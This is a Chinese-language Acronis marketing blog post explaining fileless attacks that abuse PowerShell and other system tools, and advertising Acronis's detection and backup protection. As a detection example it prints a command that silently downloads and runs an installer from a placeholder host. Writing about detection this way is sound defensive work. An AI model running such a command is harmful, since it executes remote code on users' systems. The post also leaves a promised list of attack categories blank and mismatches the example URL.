面对来无影去无踪的无文件攻击,如何防御无痕迹的暗杀?

2020-11-20

安克诺斯 数据保护 网络安全

网络这个无形的战场上,每天无时无刻不在进行着战争。我们不断提高防御水平,而魔高一丈的网络犯罪分子也不断调整或探索新的攻击媒介。这就产生了“LotL”进行无文件攻击的方式。这个概念已经存在了数十年,过去曾在Unix攻击中大量使用,但是最近在Windows系统上又重新复燃。

无文件恶意软件攻击,真的无文件?

无文件攻击的定义很多,但略有不同。简而言之,无文件攻击是指磁盘上没有特定的恶意文件。无文件攻击利用合法的应用程序和流程来执行恶意活动。当预先安装的合法软件被用于无文件攻击时,该技术通常被称为“LotL”。我们经常看到攻击链的某些阶段正在使用无文件技术,因此从技术上讲,整个攻击不是无文件的。与传统恶意软件的不同之处在于,它不需要安装恶意软件来感染受害者的计算机。相反,它利用了计算机上的现有漏洞。它存在于计算机的内存中,并使用常见的系统工具通过将恶意代码注入正常安全且受信任的进程(如javaw.exe和iexplore.exe)来执行攻击。这些攻击可以在不下载任何恶意文件的情况下控制计算机,因此得名。

无文件攻击为什么会增长?

无文件攻击比基于恶意软件的传统威胁更容易实施也更有效。所以,网络罪犯然会寻找阻力最小成功率最高的的途径实施攻击,这也正是越来越多的网络罪犯采用无文件攻击的原因所在。据Ponemon Institute的2017年“端点安全风险状况报告”表明,成功的恶意软件攻击中有77%涉及无文件技术攻击。早在2017年4月,黑客通过新型恶意软件 “ATMitch”,以“无文件攻击”方式,一夜劫持俄罗斯8台ATM机,窃走80万美元。在今年年初,全球40个国家的140多家包括银行、电信和政府机构等组织遭到 “ATMitch”无文件攻击,感染机构遍布美国、法国、厄瓜多尔、肯尼亚、英国和俄罗斯等国家。

无文件的攻击方式

一种更常见的技术是发送网络钓鱼电子邮件,试图欺骗人们点击恶意链接或打开恶意附件,例如包含宏的Microsoft Word文档。一旦黑客获得访问权限,他们就会直接从计算机的内存中运行命令或恶意软件。他们经常利用内置的系统管理工具(如Windows PowerShell或计划任务)来运行命令和恶意软件。有四种主要攻击类别:

Acronis如何保护您免受无文件的攻击?

Acronis行为引擎会监视PowerShell和其他应用程序,分析它们在做什么以识别意外的,罕见的行为。这意味着,如果任何一种已执行的脚本进行可疑的操作,而这些操作可能导致系统受损,则脚本将被停止,管理员将收到警报。

让我们看一个示例,看看将Acronis行为引擎与URL过滤结合使用将如何帮助您:

msiexec/q/i http://domain.tld/cmd-msi.png

1. Acronis行为引擎(ABE)看到msiexec是通过上述命令行执行的。

2. ABE在http://domain.tld/cmd.png上调用URL过滤。

3. ABE从URL过滤得知此URL是恶意的 。

4. ABE终止该过程并发出警报。

Acronis的基于AI的静态分析器也经过了训练,可以检查正在运行的脚本的结果,从而提供第二意见和另一层安全性。如果攻击者由于服务器未正确打补丁而能够上载初始脚本,则意味着没有漏洞评估和补丁管理功能。Acronis可通过利用嵌入式漏洞评估和补丁程序管理来帮助防御此类攻击媒介。借助这些功能,可以在甚至需要Acronis行为式引擎或基于 AI 的分析器之前就停止攻击。

另外,基于AI的强大Acronis的主动保护技术,即使网络犯罪分子发现了新的漏洞或渗透系统的方法,机器学习也会检测到勒索软件的进程并阻止它们。

Acronis主动保护技术还保护备份文件。当犯罪分子开始攻击备份文件时,Acronis主动保护技术是阻止这种攻击的有效反勒索软件,它可以阻止系统中除Acronis软件外的任何进程修改备份文件。我们还实施了强大的自卫机制,抵御任何典型的攻击,不允许犯罪分子破坏Acronis软件的工作或更改备份文件的内容。机器学习和新的启发式算法使Acronis主动保护成为针对当今勒索软件和未来变体的绝佳的数据保护技术。

所以说,集成了备份和顶级安全性能的Acronis产品,是新一代的具有前瞻性的网络安全的解决方案,不仅全方位的确保当下客户数据的安全性,也满足了将来复杂IT环境下的数据保护的需求。